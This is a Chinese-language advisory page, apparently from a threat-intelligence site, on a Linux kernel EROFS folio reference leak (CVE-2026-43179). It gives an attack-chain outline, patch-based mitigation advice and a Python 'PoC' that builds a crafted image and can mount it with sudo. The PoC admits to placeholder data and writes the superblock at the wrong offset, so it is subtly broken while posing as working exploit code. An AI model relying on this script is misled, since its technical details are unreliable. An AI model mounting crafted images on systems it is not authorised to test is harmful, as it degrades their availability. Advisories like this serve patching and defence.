CVE-2026-43179 CVSS 5.5 中危

CVE-2026-43179: Linux内核EROFS引用泄露漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43179

漏洞类型

内存泄露

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核EROFS文件系统在处理启用了元数据压缩的特制镜像时，因错误的早期退出逻辑导致folio引用泄露。该漏洞虽不直接导致系统崩溃，但可能长期消耗内存资源，影响系统可用性。

技术细节

该漏洞位于Linux内核的EROFS（Enhanced Read-Only File System）驱动程序中。当系统解析启用了metabox（元数据压缩）的EROFS镜像时，若检测到无效格式，代码会执行早期返回。然而，错误处理路径未能正确释放已获取的folio页引用，造成内存泄露。攻击者需拥有本地低权限账号，通过挂载特制的恶意EROFS镜像触发该漏洞。虽然描述称不会导致崩溃，但持续的内存泄露可能最终导致系统资源耗尽。

攻击链分析

STEP 1

准备阶段

攻击者构造一个启用了元数据压缩（metabox）但包含无效数据的特制EROFS镜像文件。

STEP 2

投递阶段

攻击者将特制镜像文件上传至目标系统，或诱导本地用户下载该文件。

STEP 3

触发阶段

攻击者（或本地低权限用户）执行挂载操作，尝试将该镜像挂载到文件系统中。

STEP 4

漏洞利用

内核EROFS驱动解析镜像时遇到无效元数据，触发错误的早期返回路径，导致folio引用泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-43179: EROFS folio reference leak
# This script creates a crafted EROFS image with invalid metabox.

import struct
import os

# EROFS magic number
EROFS_SUPER_MAGIC = 0xE0F5E1E2

def create_crafted_image(filename):
    with open(filename, 'wb') as f:
        # Write Superblock (128 bytes)
        # Offset 0: Magic (4 bytes)
        f.write(struct.pack('<I', EROFS_SUPER_MAGIC))
        # Offset 4: Checksum (4 bytes)
        f.write(struct.pack('<I', 0))
        # Offset 8: Feature_compat (4 bytes) - Enable metabox (0x00000004)
        f.write(struct.pack('<I', 0x00000004)) 
        # Fill rest of superblock with zeros (simplified)
        f.write(b'\x00' * (128 - 12))
        
        # Write invalid metabox data to trigger the bug
        # This is a placeholder for the actual complex structure required
        f.write(b'INVALID METABOX DATA' * 100)

    print(f"[+] Crafted EROFS image created: {filename}")

def trigger_vulnerability(image_path):
    print(f"[*] Attempting to mount {image_path}...")
    # This requires root privileges or user namespace capabilities
    # In a real scenario, this would trigger the folio leak in the kernel
    os.system(f"sudo mount -t erofs -o loop {image_path} /mnt/erofs_test 2>&1")
    print("[+] If kernel is vulnerable, memory leak occurred.")

if __name__ == "__main__":
    img_name = "crafted_erofs.img"
    create_crafted_image(img_name)
    # trigger_vulnerability(img_name) # Uncomment to run actual mount

影响范围

Linux Kernel (所有启用了EROFS且包含metabox补丁的版本，具体见参考链接中的修复提交)

防御指南

临时缓解措施

建议立即应用官方发布的内核补丁。在无法立即升级的情况下，应限制对EROFS文件系统挂载功能的访问权限，禁止加载不可信的镜像文件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表